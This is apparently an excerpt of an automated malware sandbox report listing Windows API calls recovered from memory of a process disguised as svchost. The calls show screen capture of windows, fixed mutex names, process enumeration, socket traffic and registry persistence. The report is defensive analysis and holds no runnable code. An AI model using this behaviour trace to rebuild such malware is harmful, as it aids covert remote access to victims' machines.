                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: SelectObject.GDI32(00000000,00000000), ref: 02BB8F3A
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: DeleteObject.GDI32(00000000), ref: 02BB8F49
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: DeleteDC.GDI32(00000000), ref: 02BB8F57
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: SelectObject.GDI32(?,00000000), ref: 02BB8F67
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: DeleteObject.GDI32(00000000), ref: 02BB8F6F
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: DeleteDC.GDI32(?), ref: 02BB8F78
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: GetDC.USER32(00000000), ref: 02BB8F7C
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: CreateCompatibleDC.GDI32(00000000), ref: 02BB8F8B
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: CreateCompatibleDC.GDI32(00000000), ref: 02BB8F93
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BB8FB4
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: SelectObject.GDI32(?,00000000), ref: 02BB8FC3
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 02BB8FDE
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: SelectObject.GDI32(00000000,00000000), ref: 02BB8FFD
                                                                                                                                                                                                                  • Part of subcall function 02BB8F20: ReleaseDC.USER32(00000000,00000000), ref: 02BB900C
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000001F4), ref: 02BB937C
                                                                                                                                                                                                                • GetTopWindow.USER32(00000000), ref: 02BB938B
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB939E
                                                                                                                                                                                                                • GetWindow.USER32(00000000,00000005), ref: 02BB93B4
                                                                                                                                                                                                                • GetWindow.USER32(00000000), ref: 02BB93B7
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000,00000000), ref: 02BB93C6
                                                                                                                                                                                                                • SetEvent.KERNEL32(00000000), ref: 02BB93CF
                                                                                                                                                                                                                • Sleep.KERNEL32(00000032), ref: 02BB93DB
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                • API ID: Object$CompatibleCreateDeleteSelect$Window$BitmapReleaseSingleWait$DesktopEventMutexSleepThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 4064958368-0
                                                                                                                                                                                                                • Opcode ID: 9782378ee69adfe75deba3b483381e0af36469353c0ed410b931e358c443b651
                                                                                                                                                                                                                • Instruction ID: ef8b85a6af4b34403e0eae7e694e3c698f7b79f1021d6453180773febc04cb90
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9782378ee69adfe75deba3b483381e0af36469353c0ed410b931e358c443b651
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5115E75980205ABCA60AB79ECCCE6B37ACAB447907008E04B312872D5DAB4FC10CF60
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 00402FF7
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000300,004036DE,7735E610,00402FDE), ref: 0040300F
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 00403012
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,00000300), ref: 0040301F
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 00403022
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,004036DE,004036DE,7735E610,00402FDE), ref: 0040302B
                                                                                                                                                                                                                • HeapValidate.KERNEL32(00000000), ref: 0040302E
                                                                                                                                                                                                                • GetProcessHeap.KERNEL32(00000000,004036DE), ref: 0040303B
                                                                                                                                                                                                                • HeapFree.KERNEL32(00000000), ref: 0040303E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                • API ID: Heap$Process$Free$Validate$String
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 2629017576-0
                                                                                                                                                                                                                • Opcode ID: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                                • Instruction ID: 103af2a08650daedf0ea572f36775c75d91e7ca6a6ced768a9e875140008d5cd
                                                                                                                                                                                                                • Opcode Fuzzy Hash: edeb09d6da527b41af017446eb360d9cd81bb1d2aa2956dafed66ea6837698d8
                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5F05EB56012117BEA206BB66D8CF572A6CEF88B82F084025B709F2180CA74CE109678
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GdiFlush.GDI32(00000000,?,00000000), ref: 02BB88B6
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BB88C4
                                                                                                                                                                                                                • IsBadWritePtr.KERNEL32(?,?), ref: 02BB88DA
                                                                                                                                                                                                                • IsBadReadPtr.KERNEL32(00000000,?), ref: 02BB88E6
                                                                                                                                                                                                                • memcpy.MSVCRT(?,00000000,?), ref: 02BB88F3
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BB8915
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                • API ID: FlushMutexObjectReadReleaseSingleWaitWritememcpy
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 3485819771-465009422
                                                                                                                                                                                                                • Opcode ID: c8a9c4738d92e97b8ab842a2833263fe036c2740f70751d942ee49cc91445c56
                                                                                                                                                                                                                • Instruction ID: 025b83dc8ec62b252a8dd7d47ffe644a09144d5d360d739ad2234437003c65b6
                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8a9c4738d92e97b8ab842a2833263fe036c2740f70751d942ee49cc91445c56
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 1D31C935E401049FCF11CF69D984AFA7BBEEF88794B1485A9EA44DB345D770E811CB90
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02BBBAAF
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02BBBAD4
                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 02BBBAE2
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32 ref: 02BBBB17
                                                                                                                                                                                                                • IsWindow.USER32(?), ref: 02BBBB1E
                                                                                                                                                                                                                • SendMessageA.USER32(?,00000215,00000000,00000000), ref: 02BBBB2E
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                • API ID: Window$CurrentMessageMutexObjectReleaseSendSingleThreadWait
                                                                                                                                                                                                                • String ID: P0Wu
                                                                                                                                                                                                                • API String ID: 1675675969-465009422
                                                                                                                                                                                                                • Opcode ID: 68d0da7ad59ad818ef8cf61064f3d28e91baabc622ec85d77a47d13579a7b37f
                                                                                                                                                                                                                • Instruction ID: 5a711949704ea66b8b8a19a7ef3818136c67d139eca0be969fcca451e9fb4231
                                                                                                                                                                                                                • Opcode Fuzzy Hash: 68d0da7ad59ad818ef8cf61064f3d28e91baabc622ec85d77a47d13579a7b37f
                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8C01F532A411109BD7759F28FC0CFF533A0EF447A9F454AA5EA059B295C3B19852CFA0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}), ref: 02BD193E
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,Local\{BE3C9D87-B777-4e47-8B10-69798A04C732},00000006), ref: 02BD195B
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BD1962
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BD1974
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD1985
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                                • String ID: Local\{BE3C9D87-B777-4e47-8B10-69798A04C732}$P0Wu
                                                                                                                                                                                                                • API String ID: 1370207991-1214925433
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • CreateMutexA.KERNEL32(00000000,00000000,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}), ref: 02BCB98E
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,?,00000000), ref: 02BD59EE
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: GetSecurityDescriptorSacl.ADVAPI32(?,?,00000001,02BB5DE8,?,?,02BB5DE8,?,00000001), ref: 02BD5A0B
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: SetNamedSecurityInfoA.ADVAPI32(?,02BB5DE8,00000010,00000000,00000000,00000000,00000001), ref: 02BD5A26
                                                                                                                                                                                                                  • Part of subcall function 02BD59D0: LocalFree.KERNEL32(?,?,?,02BB5DE8,?,00000001), ref: 02BD5A37
                                                                                                                                                                                                                • Sleep.KERNEL32(000003E8,Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014},00000006), ref: 02BCB9AB
                                                                                                                                                                                                                • ReleaseMutex.KERNEL32(00000000), ref: 02BCB9B2
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCB9C4
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BCB9D5
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Security$Descriptor$HandleMutex$CloseConvertCreateFreeInfoInformationLocalNamedReleaseSaclSleepString
                                                                                                                                                                                                                • String ID: Local\{EAF799BF-8989-4fe1-9A0D-95CD39D44014}$P0Wu
                                                                                                                                                                                                                • API String ID: 1370207991-3712121269
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • send.WS2_32(?,02BF9E44,00000002,00000000), ref: 02BC9A2A
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000002,00000000), ref: 02BC9A4E
                                                                                                                                                                                                                • recv.WS2_32(?,00000001,?,00000000), ref: 02BC9A7C
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000001,00000000), ref: 02BC9AA0
                                                                                                                                                                                                                • recv.WS2_32(?,?,?,00000000), ref: 02BC9AC5
                                                                                                                                                                                                                • lstrcmpA.KERNEL32(02BFFCA8,00000001,?,00000000), ref: 02BC9AED
                                                                                                                                                                                                                • lstrcmpA.KERNEL32(02BFFBA0,?,?,00000000), ref: 02BC9AFF
                                                                                                                                                                                                                • send.WS2_32(?,02BF9E48,00000002,00000000), ref: 02BC9B0E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: recv$lstrcmpsend
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1090895577-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • IsWindowVisible.USER32(02BBD21D), ref: 02BBCAAF
                                                                                                                                                                                                                • GetWindowInfo.USER32(02BBD21D,?), ref: 02BBCAC9
                                                                                                                                                                                                                • GetClassLongA.USER32(02BBD21D,000000E6), ref: 02BBCB1E
                                                                                                                                                                                                                • PrintWindow.USER32(02BBD21D,?,00000000), ref: 02BBCB37
                                                                                                                                                                                                                • BitBlt.GDI32(02BBCD02,?,?,?,?,76C1BCB0,00000000,00000000,00CC0020), ref: 02BBCBDE
                                                                                                                                                                                                                  • Part of subcall function 02BBDCE0: GetClassNameA.USER32(?,?,00000101), ref: 02BBDCF6
                                                                                                                                                                                                                  • Part of subcall function 02BBC8D0: SendMessageA.USER32(00000000,?,00000004,00000000), ref: 02BBC8F8
                                                                                                                                                                                                                  • Part of subcall function 02BBC8D0: GdiFlush.GDI32(00000000,?,02BBC9F1,00000000,?), ref: 02BBC90E
                                                                                                                                                                                                                  • Part of subcall function 02BBC8D0: BitBlt.GDI32(02BBC9F1,00000000,00000000,?,02BBC9F1,?,00000000,00000000,00CC0020), ref: 02BBC934
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: Window$Class$FlushInfoLongMessageNamePrintSendVisible
                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                • API String ID: 2334662925-4251816714
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBB8F
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBBBB
                                                                                                                                                                                                                • VirtualQuery.KERNEL32(Function_00025460,?,0000001C), ref: 02BBBBE2
                                                                                                                                                                                                                • GetUserObjectInformationA.USER32(?,00000002,?,00000100,?), ref: 02BBBC11
                                                                                                                                                                                                                • lstrcmpiA.KERNEL32(?,9e93884aa), ref: 02BBBC27
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: QueryVirtual$InformationObjectUserlstrcmpi
                                                                                                                                                                                                                • String ID: 9e93884aa
                                                                                                                                                                                                                • API String ID: 410342393-2189048855
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 004015C4
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,?,7702DB30), ref: 004015CF
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 004015F5
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 00401610
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 0040161C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401638
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0040164A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3955875343-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • memset.MSVCRT ref: 02BD4C14
                                                                                                                                                                                                                • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02BD4C1F
                                                                                                                                                                                                                • Process32First.KERNEL32 ref: 02BD4C45
                                                                                                                                                                                                                • StrStrIA.SHLWAPI(?,?), ref: 02BD4C60
                                                                                                                                                                                                                • Process32Next.KERNEL32(00000000,?), ref: 02BD4C6C
                                                                                                                                                                                                                • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD4C88
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 02BD4C9A
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: HandleProcess32$CloseCreateFirstInformationNextSnapshotToolhelp32memset
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3955875343-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • htons.WS2_32(?), ref: 02BE1314
                                                                                                                                                                                                                • inet_addr.WS2_32(?), ref: 02BE131F
                                                                                                                                                                                                                • htonl.WS2_32(000000FF), ref: 02BE132A
                                                                                                                                                                                                                • gethostbyname.WS2_32(?), ref: 02BE1336
                                                                                                                                                                                                                • socket.WS2_32(00000002,00000001,00000000), ref: 02BE1350
                                                                                                                                                                                                                • connect.WS2_32(00000000,?,00000010), ref: 02BE1363
                                                                                                                                                                                                                • closesocket.WS2_32(00000000), ref: 02BE136E
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: closesocketconnectgethostbynamehtonlhtonsinet_addrsocket
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 298246419-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • RegOpenKeyExA.ADVAPI32(00000001,software\microsoft,00000000,00000102,-80000001,?,?,?,?,?,?,0000001C,00000000), ref: 02BC18AD
                                                                                                                                                                                                                • RegSetValueExA.ADVAPI32(-80000001,9E938DA8a,00000000,00000001,?,00000104,?,?,?,?,0000001C,00000000), ref: 02BC18CF
                                                                                                                                                                                                                • RegFlushKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02BC18DD
                                                                                                                                                                                                                • RegCloseKey.ADVAPI32(-80000001,?,?,?,?,0000001C,00000000), ref: 02BC18F0
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: CloseFlushOpenValue
                                                                                                                                                                                                                • String ID: 9E938DA8a$software\microsoft
                                                                                                                                                                                                                • API String ID: 2510291871-208054846
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
                                                                                                                                                                                                                • OpenProcessToken.ADVAPI32(00000000), ref: 00403510
                                                                                                                                                                                                                • GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
                                                                                                                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 00403547
                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                • \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2639699727.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.2639699727.000000000045E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_400000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
                                                                                                                                                                                                                • String ID: \\?\globalroot\systemroot\system32\tasks\
                                                                                                                                                                                                                • API String ID: 4133869067-1576788796
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • shutdown.WS2_32(?,00000001), ref: 02BC990B
                                                                                                                                                                                                                • shutdown.WS2_32(02BC99EC,00000001), ref: 02BC9910
                                                                                                                                                                                                                • recv.WS2_32(02BC99EC,?,00000400,00000000), ref: 02BC992F
                                                                                                                                                                                                                • recv.WS2_32(?,?,00000400,00000000), ref: 02BC9945
                                                                                                                                                                                                                • closesocket.WS2_32(?), ref: 02BC9959
                                                                                                                                                                                                                • closesocket.WS2_32(02BC99EC), ref: 02BC995C
                                                                                                                                                                                                                • ExitThread.KERNEL32 ref: 02BC9960
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
• Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
• Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: closesocketrecvshutdown$ExitThread
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 1638183600-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                • API ID: callocexitfree
                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                • API String ID: 3367576030-0
                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02BD52EB
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02BD531C
                                                                                                                                                                                                                • TranslateMessage.USER32(?), ref: 02BD5338
                                                                                                                                                                                                                • DispatchMessageW.USER32(?), ref: 02BD533E
                                                                                                                                                                                                                • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 02BD534C
                                                                                                                                                                                                                • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,00002710,000004FF), ref: 02BD5364
                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                • Source File: 00000002.00000002.2655337628.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C09000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                • Associated: 00000002.00000002.2655337628.0000000002C0E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                • Snapshot File: hcaresult_2_2_2bb0000_svchost.jbxd
